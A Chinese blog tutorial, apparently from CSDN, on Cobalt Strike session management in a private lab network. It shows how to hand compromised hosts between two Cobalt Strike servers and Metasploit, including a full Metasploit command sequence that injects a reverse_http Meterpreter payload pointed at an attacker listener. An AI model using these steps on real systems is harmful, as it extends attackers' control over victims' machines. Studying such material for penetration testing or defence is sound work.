• 内网渗透神器CobaltStrike之会话管理(五)


    CS之间派生会话

    将CS1管理的会话派生至CS2中, 简单来说就是将CS1服务器的肉鸡送给CS2服务器


    准备环境

    主机描述
    Kali(192.168.47.134)CS TeamServer1
    Kali2(192.168.47.144)CS TeamServer2
    Windows7(192.168.47.133)CS客户端,攻击机
    Windows7(192.168.47.141)受害机

    操作步骤

    首先用CS客户端连接两个不同的CS服务器, 而我们要做的是将CS1的会话派生到CS2中去

    image-20221005225524757


    在CS2服务器和CS1服务器都新建一个同样配置的监听用于接收派生过来的会话, 监听的host地址要填写为CS2服务器ip地址

    image-20221005225938081

    image-20221005230525306


    派生会话选择上述建立的监听, 随后切换至连接CS2服务器的客户端查看派生过来的主机

    动画

    1


    CS派生会话至metasploit

    将CS服务器的会话派生至metasploit中, 方便进行漏洞攻击


    准备环境

    主机描述
    Kali(192.168.47.134)CS TeamServer1
    Kali2(192.168.47.144)metasploit
    Windows7(192.168.47.133)CS客户端,攻击机
    Windows7(192.168.47.141)受害机

    操作步骤

    进入kali2输入命令:msfconsole, 运行metasploit

    image-20221005234248726


    metasploit新建监听用于接收CS派生过来的会话

    image-20221006153754571


    返回至CS服务器建立外部监听, payload选择Foreign HTTP, 其余内容与metasploit建立的监听一致

    image-20221006153852260


    派生会话选择上述建立的外部监听t, 然后返回Metasploit查看上线情况

    动画


    metasploit派生会话至CS

    将metasploit管理的会话派生至CS服务器


    准备环境

    主机描述
    Kali(192.168.47.134)CS TeamServer1
    Kali2(192.168.47.144)metasploit
    Windows7(192.168.47.133)CS客户端,攻击机
    Windows7(192.168.47.141)受害机

    操作步骤

    首先查看MSF中需派生会话的ID, 输入命令: sessions, 此处要派生的会话ID为6 (下面的截图截错了)

    image-20221006163339205


    输入如下命令进行派生会话, 派生完成后返回会话的进程PID为3322

    use exploit/windows/local/payload_inject  
    
    set payload windows/meterpreter/reverse_http
    
    set lhost 192.168.47.134
    
    set lport 80
    
    set disablepayloadhandler True  //默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于我们已经有了一个,所以不需要在产生一个,所以这里我们设置为true
    
    set session 6
    
    exploit
    
    • 1
    • 2
    • 3
    • 4
    • 5
    • 6
    • 7
    • 8
    • 9
    • 10
    • 11
    • 12
    • 13

    image-20221006173316522


    返回CS查看上线的会话 (PID:3332)

    image-20221006173808452

  • 相关阅读:
    realsense d455 semantic_slam实现语义八叉树建图
    技术管理进阶——总监以上一定要会经济学
    Linux系统编程(2)
    STM32--ADC
    JVM中常量池存放在哪里
    webpack配置单页面和多页面
    【源码分析】Spring依赖注入原理
    makefile & dockerfile
    基于Halcon的喷码识别方法
    Redis(四)——Jedis操作Redis6、Redis6与SpringBoot整合
  • 原文地址:https://blog.csdn.net/xf555er/article/details/127966848